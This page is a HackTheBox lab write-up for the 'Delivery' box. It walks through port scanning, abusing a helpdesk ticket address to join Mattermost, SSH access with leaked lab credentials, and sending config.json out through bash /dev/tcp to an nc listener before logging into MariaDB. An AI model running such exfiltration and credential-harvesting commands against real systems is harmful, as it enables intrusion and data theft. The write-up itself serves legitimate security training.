<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Delivery - HackTheBox Writeup (10.10.10.222) | [email protected]~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Delivery - HackTheBox Writeup (10.10.10.222)">
<meta name="description" content="Easy-difficulty Linux box demonstrating a clever enumeration technique of leveraging the ticketing system to obtain a temporary email address under the victim's domain. Privilege escalation by dumping the password hash from MySQL and cracking it with mutation rules.">
<meta property="og:description" content="Easy-difficulty Linux box demonstrating a clever enumeration technique of leveraging the ticketing system to obtain a temporary email address under the victim's domain. Privilege escalation by dumping the password hash from MySQL and cracking it with mutation rules.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/c55af6eadd5b60bac831d73c1a951327.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/c55af6eadd5b60bac831d73c1a951327.png"></span>
</div>
<h1 class="Header__Title">Delivery - HackTheBox Writeup (10.10.10.222)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Wed, Jun 2, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--green">
<a href="tag/Easy">Easy</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--red">
<a href="tag/Web_Application">Web Application</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/MatterMost">MatterMost</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/MySQL">MySQL</a>
</span>
</div>
<div>
Easy-difficulty Linux box demonstrating a clever enumeration technique of leveraging the ticketing system to obtain a temporary email address under the victim's domain. Privilege escalation by dumping the password hash from MySQL and cracking it with mutation rules.
</div>
</header>
<article id="https://www.notion.so/76ab465f1fc344308d2891cdf950cee2" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/c4de33f394814cc18535a77b902ee26f" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/c4de33f394814cc18535a77b902ee26f"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/99cbbe8162e84eedb158083cfaada5bc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/bec8b1399eb449c48364ddbe07364998" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.222 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/51550c3bffd343c99f7c9c1bf2f6e0c8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8065/tcp open unknown</span></span></span></code></pre></li><li id="https://www.notion.so/fb678c56b7a6420e8b7478456441eb0c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/abada3de244d4235995c3fbb91dfd788" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,80,8065 10.10.10.222 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/c489ec0068fd4538b120d343f6bc5aaf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
| 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open unknown
| fingerprint-strings:
| GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Accept-Ranges: bytes
| Cache-Control: no-cache, max-age=31556926, public
| Content-Length: 3108
| Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
| Content-Type: text/html; charset=utf-8
| Last-Modified: Mon, 11 Jan 2021 05:17:11 GMT
| X-Frame-Options: SAMEORIGIN
| X-Request-Id: kmjssp164prqpqmskbtjbjqpoe
| X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
| Date: Mon, 11 Jan 2021 05:20:34 GMT
| <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Date: Mon, 11 Jan 2021 05:20:34 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8065-TCP:V=7.91%I=7%D=1/11%Time=5FFBE005%P=x86_64-unknown-linux-gnu
SF:%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ran
SF:ges:\x20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20pu
SF:blic\r\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-an
SF:cestors\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Mon,\x
SF:2011\x20Jan\x202021\x2005:17:11\x20GMT\r\nX-Frame-Options:\x20SAMEORIGI
SF:N\r\nX-Request-Id:\x20kmjssp164prqpqmskbtjbjqpoe\r\nX-Version-Id:\x205\
SF:.30\.0\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20M
SF:on,\x2011\x20Jan\x202021\x2005:20:34\x20GMT\r\n\r\n<!doctype\x20html><h
SF:tml\x20lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20name=\"vie
SF:wport\"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1
SF:,user-scalable=0\"><meta\x20name=\"robots\"\x20content=\"noindex,\x20no
SF:follow\"><meta\x20name=\"referrer\"\x20content=\"no-referrer\"><title>M
SF:attermost</title><meta\x20name=\"mobile-web-app-capable\"\x20content=\"
SF:yes\"><meta\x20name=\"application-name\"\x20content=\"Mattermost\"><met
SF:a\x20name=\"format-detection\"\x20content=\"telephone=no\"><link\x20re"
SF:)%r(HTTPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDat
SF:e:\x20Mon,\x2011\x20Jan\x202021\x2005:20:34\x20GMT\r\nContent-Length:\x
SF:200\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Requ
SF:est\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20
SF:close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerC
SF:ookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/p
SF:lain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Req
SF:uest");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></span></span></code></pre><div id="https://www.notion.so/6ebf24d8d1534b669e6c7705ecf79329" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">SSH, nginx HTTP, Mattermost HTTP.</span></span></p></div></li></ul><h2 id="https://www.notion.so/7c0a3320d4e44236a13571351d01e396" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/7c0a3320d4e44236a13571351d01e396"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/f4d5902e904d41e6958ed80fd4c7901a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found domain names under "Contact Us" hyperlinks:</span></span><pre id="https://www.notion.so/9bbbd84d3c80438d90683715d7b5da9b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>For unregistered users, please use our </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://helpdesk.delivery.htb/"><span>HelpDesk</span></a></span><span class="SemanticString"><span> to get in touch with our team.
Once you have an @delivery.htb email address, you'll be able to have access to our </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://delivery.htb:8065/"><span>MatterMost</span></a></span><span class="SemanticString"><span> server.</span></span></span></code></pre></li><li id="https://www.notion.so/c53d6bfc889a465da3f109c0cf4bdc70" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Add the following domains to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/78bc7ee8a790418a9ce35eced2d4632f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.222 delivery.htb helpdesk.delivery.htb</span></span></span></code></pre></li><li id="https://www.notion.so/b1f31c13b01a4cf891108adf68a8c90f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigating to the helpdesk site, we see that the system is running an unknown version of osTicket.</span></span></li><li id="https://www.notion.so/697f2e36f97a417c9b1e3cc697c79ff2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The target is also hosting MatterMost, a Slack-alternative messaging application, on port 8065.</span></span></li><li id="https://www.notion.so/a8833477a4ad420385dbf61240608b02" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The MatterMost server requires a valid </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">@delivery.htb</code></span><span class="SemanticString"> email address for access.</span></span></li><li id="https://www.notion.so/5400f6d7cce74d63897c07742ab5d10c" class="BulletedList"><span class="SemanticStringArray"><span 
class="SemanticString">Found helpdesk login page:</span></span><div id="https://www.notion.so/6ff833eb44cb44c485df9d00aa2b5f1b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://helpdesk.delivery.htb/login.php">http://helpdesk.delivery.htb/login.php</a></span></span></p></div></li><li id="https://www.notion.so/57a21c27e33842c0be10f57c6f7541ee" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found MatterMost login page:</span></span><div id="https://www.notion.so/94ebae500b6e42c9a6336c04193cb721" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://delivery.htb:8065/login">http://delivery.htb:8065/login</a></span></span></p></div></li></ul><h2 id="https://www.notion.so/f5e5e792708f4c078eda171e5a751299" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/f5e5e792708f4c078eda171e5a751299"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/bf97cdcb364748e69571a894ed663344" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Opening a test ticket, the site responds 
with:</span></span><pre id="https://www.notion.so/3b69905fe62a43b5b4d94055e5842bdc" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>samiko,
You may check the status of your ticket, by navigating to the Check Status page using ticket id: 4944782.
If you want to add more information to your ticket, just email 4944782@delivery.htb.
Thanks,
Support Team</span></span></span></code></pre></li><li id="https://www.notion.so/765d847d1fb344dda92f8f09f0b44be3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">On the ticket status page, we can see any updates to the ticket in a message-board style display.</span></span></li><li id="https://www.notion.so/ece22b5b05074298b9d339930e1e3e5d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">As the MatterMost server requires a valid </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">@delivery.htb</code></span><span class="SemanticString"> email address, we can leverage the ticket address </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">4944782@delivery.htb</code></span><span class="SemanticString"> and register for an account.</span></span></li><li id="https://www.notion.so/3ab5c7a2c0044b2ba7db9a77ca11bbda" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Creating a new account on MatterMost using the ticket address with temporary credentials:</span></span><div id="https://www.notion.so/c6535b26314a4184b94503c90bc30963" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">samiko:Password1234!</code></span></span></p></div></li><li id="https://www.notion.so/4da3a66121c54526870385f1f2d43d8d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The verification email is sent to the ticket address, and is then displayed on the ticket's status page.</span></span></li><li id="https://www.notion.so/4645c825fca74757af3f107a439e1d87" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">After refreshing the ticket status page, we get the 
verification URL:</span></span><div id="https://www.notion.so/134f4a14f9ca4267967da55bb86a313d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://delivery.htb:8065/do_verify_email?token=94mdjjhbdx1r47d56dwcfmnpjt3cf686n6ff7wdput9zng4ht5jy57dtnsbputnu&email=4944782%40delivery.htb">http://delivery.htb:8065/do_verify_email?token=94mdjjhbdx1r47d56dwcfmnpjt3cf686n6ff7wdput9zng4ht5jy57dtnsbputnu&email=4944782%40delivery.htb</a></span></span></p></div></li><li id="https://www.notion.so/0539341aea174b308508cb59a837fece" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Logging in to MatterMost with the temporary credentials, we see that we are able to join the "Internals" team without any extra authentication.</span></span></li><li id="https://www.notion.so/df70d1811cfb4eb0b3466d87e911e682" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Messages from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">[email protected]</code></span><span class="SemanticString"> on Dec 27:</span></span><pre id="https://www.notion.so/e28459d239a64828be79b38bb400f372" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>@developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.</span></span></span></code></pre></li><li id="https://www.notion.so/ad77e1997b7349d89ca846e92349398c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found exposed credentials:</span></span><div id="https://www.notion.so/b538332ad4e2485c9933e6aa214246eb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">maildeliverer:Youve_G0t_Mail!</code></span></span></p></div></li><li id="https://www.notion.so/3204909e0c5145deacb894c16b3ed40f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">SSH into the server with the exposed credentials:</span></span><div id="https://www.notion.so/31b5806d8b7042c6807970e17422981a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh maildeliverer@10.10.10.222</code></span></span></p></div><div id="https://www.notion.so/bb065f47c7864b849af1c5a8dd5aef00" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Youve_G0t_Mail!</code></span></span></p></div><div id="https://www.notion.so/9553d337e8fb4d639ed5c50bd821ec97" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/0abc560b5d09473da0a9e33a91aecb66" class="Code 
Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>maildeliverer
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)</span></span></span></code></pre></li><li id="https://www.notion.so/cc9c5be4f8124e3aad75d4e65b074ad0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/8f7196d64ec149f8bdd37f4e9159267c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/8f7196d64ec149f8bdd37f4e9159267c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/4bbb940fb4a64d14bb76b48ca208d933" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">maildeliverer is the only user on the system.</span></span></li><li id="https://www.notion.so/ce40b043b61a43929e200404225b103f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking sudo permissions:</span></span><div id="https://www.notion.so/bfb1aee5ad834087b2420adc17c40dcc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo -l</code></span></span></p></div><pre id="https://www.notion.so/5c93953e28794680b6d564faf8a7649d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Sorry, user maildeliverer may not run 
sudo on Delivery.</span></span></span></code></pre></li><li id="https://www.notion.so/de1554581fc84b75bac6e1bdbb8c514f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Searching for config files (run from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/</code></span><span class="SemanticString">):</span></span><div id="https://www.notion.so/c1ac9f23027d4f699a9511365e6f7305" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ find . -name "config.*" 2>/dev/null</code></span></span></p></div><pre id="https://www.notion.so/b3e93adfb3ad4a6bb3d055840d8474d5" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>./opt/mattermost/config/config.json</span></span></span></code></pre></li><li id="https://www.notion.so/456896d9500e4ffe80385430acff21b0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We find the config file for the MatterMost server, which will likely contain useful passwords, given the developers' admitted habit of password reuse.</span></span></li><li id="https://www.notion.so/f9f95f9bee1243a5b36abf5d90deb4b5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Prepare to transfer </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">config.json</code></span><span class="SemanticString"> back to the local machine; listen for the file transfer with nc:</span></span><div id="https://www.notion.so/9555d02d781f465d978b345368e7c4b9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969 > config.json < /dev/null</code></span></span></p></div></li><li id="https://www.notion.so/678a4d5a6ea14e52b50ae094dcdbe7b7" class="BulletedList"><span 
class="SemanticStringArray"><span class="SemanticString">Now, on the remote host, send the file through bash's </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/dev/tcp/host/port</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/217e983010664ed58c9648fc2bdd0c6e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat config.json > /dev/tcp/10.10.14.103/6969</code></span></span></p></div></li><li id="https://www.notion.so/f2a09f17f75c4315baf5c4ee2752b771" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We discover that there is a MySQL server running locally on port 3306.</span></span></li><li id="https://www.notion.so/9839c36e6fed45c89f2af529ed7b495a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found SQL credentials in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">config.json</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/912cce1b028e479eb0443e5d777c8e34" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">mmuser:Crack_The_MM_Admin_PW</code></span></span></p></div></li><li id="https://www.notion.so/621ef28b2a354ac483e5c73bec8c5e2a" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">With this credential pair, we can log in to MatterMost's MySQL and hopefully find the root password:</span></span><div id="https://www.notion.so/6be7fc11b4fd4af5a22d1a52f192ba30" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mysql -u 'mmuser' -p 'Crack_The_MM_Admin_PW'</code></span></span></p></div><pre id="https://www.notion.so/244abb96bac646509dfad2e6dacbfdf9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>ERROR 1045 (28000): Access denied for user 'mmuser'@'localhost' (using password: NO)</span></span></span></code></pre></li><li id="https://www.notion.so/03ef5a65c3bd407fa6dfc98d304cd8cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">-p</code></span><span class="SemanticString"> option only reads the password when it is attached directly to the flag; with a space, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">mysql</code></span><span class="SemanticString"> took the value as a database name and sent no password at all (hence </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">using password: NO</code></span><span class="SemanticString">). Retry without the spaces:</span></span><div id="https://www.notion.so/32a95252b1eb46688f2e827555926938" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mysql -u'mmuser' -p'Crack_The_MM_Admin_PW'</code></span></span></p></div><pre id="https://www.notion.so/8bdf3518965d46a2b049eb41e791e8bc" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1169
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]></span></span></span></code></pre></li><li id="https://www.notion.so/aa82ae9b73dd4e4783aa0e0dabe778d3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The server is actually running MariaDB; let's enumerate the databases:</span></span><div id="https://www.notion.so/0cee5e63884349fe924bdde1b3b68078" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> show databases;</code></span></span></p></div><pre id="https://www.notion.so/3129cb0200d74a3c90c29b1e51925b9d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
